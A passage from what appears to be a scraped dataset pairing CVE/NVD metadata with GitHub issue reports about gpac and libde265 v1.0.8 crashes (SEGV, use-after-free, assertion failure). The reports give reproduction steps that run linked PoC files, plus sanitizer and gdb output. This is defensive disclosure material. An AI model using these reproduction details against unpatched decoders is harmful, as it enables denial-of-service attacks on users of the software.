r11 0x7ffff79d18b5 0x7ffff79d18b5 r12 0x555555562470 0x555555562470 r13 0x7fffffffdfb0 0x7fffffffdfb0 r14 0x0 0x0 r15 0x0 0x0 rip 0x7ffff79d18fd 0x7ffff79d18fd <gf_isom_get_track_id+72> eflags 0x10202 [ IF RF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gef➤ exploitable Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: a5cc92255fba44e928c1a0bb49438db1.a5cc92255fba44e928c1a0bb49438db1 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) ```
Null pointer dereference in function gf_isom_get_track_id()
https://api.github.com/repos/gpac/gpac/issues/1406/comments
1
2020-02-08T13:37:09Z
2020-06-11T17:32:43Z
https://github.com/gpac/gpac/issues/1406
562,020,033
1,406
2,973
CVE-2021-35452
2022-01-10T22:15:08.197
An Incorrect Access Control vulnerability exists in libde265 v1.0.8 due to a SEGV in slice.cc.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/298" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/298" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "E86A03B2-D0E9-4887-AD06-FBA3F3500FC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/strukturag/libde265/issues/298
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
Hello, A SEGV has occurred when running program dec265, System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (1).zip](https://github.com/strukturag/libde265/files/6695106/poc.1.zip) Verification steps: 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265(without asan) ``` ./dec265 poc ``` Output ``` WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid Segmentation fault(core dumped) ``` AddressSanitizer output ``` ================================================================= ==1960598==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x7f65de25eac3 bp 0x61b000001c80 sp 0x7ffe41764b90 T0) ==1960598==The signal is caused by a READ memory access. #0 0x7f65de25eac2 in slice_segment_header::read(bitreader*, decoder_context*, bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:390 #1 0x7f65de14837a in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:626 #2 0x7f65de14a839 in decoder_context::decode_NAL(NAL_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1230 #3 0x7f65de14be1e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1318 #4 0x55d4ecf488fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #5 0x7f65ddc9a0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #6 0x55d4ecf4b76d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:390 in slice_segment_header::read(bitreader*, decoder_context*, bool*) ==1960598==ABORTING ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0xffffffffffffff90 RCX: 0x617000000090 --> 0x100000000 --> 0x0 RDX: 0xc2e00000013 --> 0x0 RSI: 0x20000000 ('') RDI: 0x617000000098 --> 0x100000001 --> 0x0 RBP: 0x61b000001c80 --> 0xbebebebe00000000 RSP: 0x7fffffff3570 --> 0x0 RIP: 0x7ffff73abac3 (<slice_segment_header::read(bitreader*, decoder_context*, bool*)+2387>: movzx r14d,BYTE PTR [rsi+0x7fff8000]) R8 : 0xfffff8f8 --> 0x0 R9 : 0x7 R10: 0x9 ('\t') R11: 0xfffffffe6c8 --> 0x0 R12: 0x7ffff31ff800 --> 0xbebebebebebebebe R13: 0x7fffffff3a40 --> 0x62e000078405 --> 0xbebebebebebebebe R14: 0xffffe641bdb --> 0x0 R15: 0x555555569bd0 --> 0x7ffff31ff800 --> 0xbebebebebebebebe EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff73abab6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2374>: mov rsi,QWORD PTR [rcx+0x8] 0x7ffff73ababa <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2378>: mov QWORD PTR [rsp+0x10],rsi 0x7ffff73ababf <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2383>: shr rsi,0x3 => 0x7ffff73abac3 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2387>: movzx r14d,BYTE PTR [rsi+0x7fff8000] 0x7ffff73abacb <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2395>: test r14b,r14b 0x7ffff73abace <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2398>: je 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406>: je 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406> 0x7ffff73abad0 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2400>: jle 0x7ffff73b31dc <slice_segment_header::read(bitreader*, decoder_context*, bool*)+32876>: jle 0x7ffff73b31dc <slice_segment_header::read(bitreader*, decoder_context*, bool*)+32876> 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406>: mov rax,QWORD PTR [rsp+0x10] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff3570 --> 0x0 0008| 0x7fffffff3578 --> 0x621000000100 --> 0x7ffff7565f30 --> 0x7ffff72719e0 (<decoder_context::~decoder_context()>: endbr64) 0016| 0x7fffffff3580 --> 0x100000001 --> 0x0 0024| 0x7fffffff3588 --> 0x61b000001c88 --> 0x617000000090 --> 0x100000000 --> 0x0 0032| 0x7fffffff3590 --> 0x7fffffff3780 --> 0x0 0040| 0x7fffffff3598 --> 0x7fffffff3620 --> 0x41b58ab3 0048| 0x7fffffff35a0 --> 0x61b000001ca0 --> 0xbebebe00 --> 0x0 0056| 0x7fffffff35a8 --> 0xfffffffe6c4 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff73abac3 in slice_segment_header::read ( this=this@entry=0x61b000001c80, br=br@entry=0x7fffffff3a40, ctx=ctx@entry=0x621000000100, continueDecoding=continueDecoding@entry=0x7fffffff3780) at /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:390 390 if (!sps->sps_read) { ``` **This issue will cause Denial of Service attacks**
SEGV in slice.cc
https://api.github.com/repos/strukturag/libde265/issues/298/comments
4
2021-06-22T14:49:43Z
2022-12-12T14:41:13Z
https://github.com/strukturag/libde265/issues/298
927,319,386
298
2,974
CVE-2021-36408
2022-01-10T23:15:08.963
An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/299" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/299" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "E86A03B2-D0E9-4887-AD06-FBA3F3500FC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/strukturag/libde265/issues/299
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
Hello, A Heap-use-after-free has occurred when running program dec265 System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc.zip](https://github.com/strukturag/libde265/files/6698738/poc.zip) Verification steps: 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265 ``` ./dec265 poc ``` asan info ``` ================================================================= ==1538158==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000007e04 at pc 0x7efe5f2b9526 bp 0x7ffceaaa13c0 sp 0x7ffceaaa13b0 READ of size 4 at 0x625000007e04 thread T0 #0 0x7efe5f2b9525 in intra_border_computer<unsigned char>::fill_from_image() /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 #1 0x7efe5f2ba6e9 in void fill_border_samples<unsigned char>(de265_image*, int, int, int, int, unsigned char*) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:260 #2 0x7efe5f2ba6e9 in void decode_intra_prediction_internal<unsigned char>(de265_image*, int, int, IntraPredMode, unsigned char*, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:284 #3 0x7efe5f2a5383 in decode_intra_prediction(de265_image*, int, int, IntraPredMode, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:335 #4 0x7efe5f31dc52 in decode_TU /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3453 #5 0x7efe5f342e76 in read_transform_unit(thread_context*, int, int, int, int, int, int, int, int, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3665 #6 0x7efe5f347191 in read_transform_tree(thread_context*, int, int, int, int, int, int, int, int, int, int, int, PredMode, unsigned char, unsigned char) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3942 #7 0x7efe5f34e119 in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4575 #8 0x7efe5f3548f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4652 #9 0x7efe5f354357 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4635 #10 0x7efe5f356564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4741 #11 0x7efe5f358ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:5054 #12 0x7efe5f23dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:843 #13 0x7efe5f240c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:945 #14 0x7efe5f241715 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:730 #15 0x7efe5f24695e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329 #16 0x55990c1348fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #17 0x7efe5ed950b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #18 0x55990c13776d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) 0x625000007e04 is located 1284 bytes inside of 8600-byte region [0x625000007900,0x625000009a98) freed by thread T0 here: #0 0x7efe5f6408df in operator delete(void*) (/lib/x86_64-linux-gnu/libasan.so.5+0x1108df) #1 0x7efe5f24b576 in std::_Sp_counted_ptr_inplace<pic_parameter_set, std::allocator<pic_parameter_set>, (__gnu_cxx::_Lock_policy)2>::_M_destroy() /usr/include/c++/9/ext/new_allocator.h:128 #2 0x7efe5f4d996f (/home/dh/sda3/libde265-master/libde265-master/build/libde265/liblibde265.so+0x37d96f) previously allocated by thread T0 here: #0 0x7efe5f63f947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) #1 0x7efe5f22cf3f in std::shared_ptr<pic_parameter_set> std::make_shared<pic_parameter_set>() /usr/include/c++/9/ext/new_allocator.h:114 #2 0x7efe5f22cf3f in decoder_context::read_pps_NAL(bitreader&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:572 #3 0x7efe5b1ff7ff (<unknown module>) #4 0x614fffffffff (<unknown module>) SUMMARY: AddressSanitizer: heap-use-after-free /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 in intra_border_computer<unsigned char>::fill_from_image() Shadow bytes around the buggy address: 0x0c4a7fff8f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8f80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8f90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c4a7fff8fc0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8ff0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff9000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff9010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1538158==ABORTING ```
Heap-use-after-free in intrapred.h when decoding file
https://api.github.com/repos/strukturag/libde265/issues/299/comments
4
2021-06-23T03:45:54Z
2022-10-01T10:45:53Z
https://github.com/strukturag/libde265/issues/299
927,828,249
299
2,975
CVE-2021-36409
2022-01-10T23:15:09.047
There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/300" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/300" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "E86A03B2-D0E9-4887-AD06-FBA3F3500FC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/strukturag/libde265/issues/300
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
Hello, There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file. System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (3).zip](https://github.com/strukturag/libde265/files/6709588/poc.3.zip) Verification steps: 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 16 ``` 3.run dec265 ``` ./dec265 poc ``` Output ``` WARNING: non-existing PPS referenced dec265: /home/dh/sda3/libde265-master/libde265-master/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed. Aborted(core dumped) ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: non-existing PPS referenced dec265-afl++: /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed. Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff6c3a680 (0x00007ffff6c3a680) RCX: 0x7ffff6e0618b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff1ab0 --> 0x0 RDI: 0x2 RBP: 0x7ffff6f7b588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffff1ab0 --> 0x0 RIP: 0x7ffff6e0618b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff1ab0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7538760 ("/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc") R13: 0x39d R14: 0x7ffff75388a0 ("scaling_list_pred_matrix_id_delta==1") R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e0617f <__GI_raise+191>: mov edi,0x2 0x7ffff6e06184 <__GI_raise+196>: mov eax,0xe 0x7ffff6e06189 <__GI_raise+201>: syscall => 0x7ffff6e0618b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff6e06193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff6e0619c <__GI_raise+220>: jne 0x7ffff6e061c4 <__GI_raise+260> 0x7ffff6e0619e <__GI_raise+222>: mov eax,r8d 0x7ffff6e061a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff1ab0 --> 0x0 0008| 0x7fffffff1ab8 --> 0x7ffff768f6f0 (<free>: endbr64) 0016| 0x7fffffff1ac0 --> 0xe4e4e4e3fbad8000 0024| 0x7fffffff1ac8 --> 0x612000000040 --> 0x612d353606800001 0032| 0x7fffffff1ad0 --> 0x6120000000a5 ("265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed.\n") 0040| 0x7fffffff1ad8 --> 0x612000000040 --> 0x612d353606800001 0048| 0x7fffffff1ae0 --> 0x612000000040 --> 0x612d353606800001 0056| 0x7fffffff1ae8 --> 0x61200000013b --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. ``` source code of sps.cc:925 ``` 912 if (scaling_list_pred_matrix_id_delta==0) { 913 if (sizeId==0) { 914 memcpy(curr_scaling_list, default_ScalingList_4x4, 16); 915 } 916 else { 917 if (canonicalMatrixId<3) 918 { memcpy(curr_scaling_list, default_ScalingList_8x8_intra,64); } 919 else 920 { memcpy(curr_scaling_list, default_ScalingList_8x8_inter,64); } 921 } 922 } 923 else { 924 // TODO: CHECK: for sizeID=3 and the second matrix, should we have delta=1 or delta=3 ? 925 if (sizeId==3) { assert(scaling_list_pred_matrix_id_delta==1); } 926 927 int mID = matrixId - scaling_list_pred_matrix_id_delta; 928 929 int len = (sizeId == 0 ? 16 : 64); 930 memcpy(curr_scaling_list, scaling_list[mID], len); 931 932 scaling_list_dc_coef = dc_coeff[sizeId][mID]; 933 dc_coeff[sizeId][matrixId] = dc_coeff[sizeId][mID]; 934 } 935 } ```
There is an Assertion failed at sps.cc
https://api.github.com/repos/strukturag/libde265/issues/300/comments
3
2021-06-24T13:41:11Z
2023-01-27T12:19:27Z
https://github.com/strukturag/libde265/issues/300
929,243,315
300
2,976
CVE-2021-36410
2022-01-10T23:15:09.093
A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
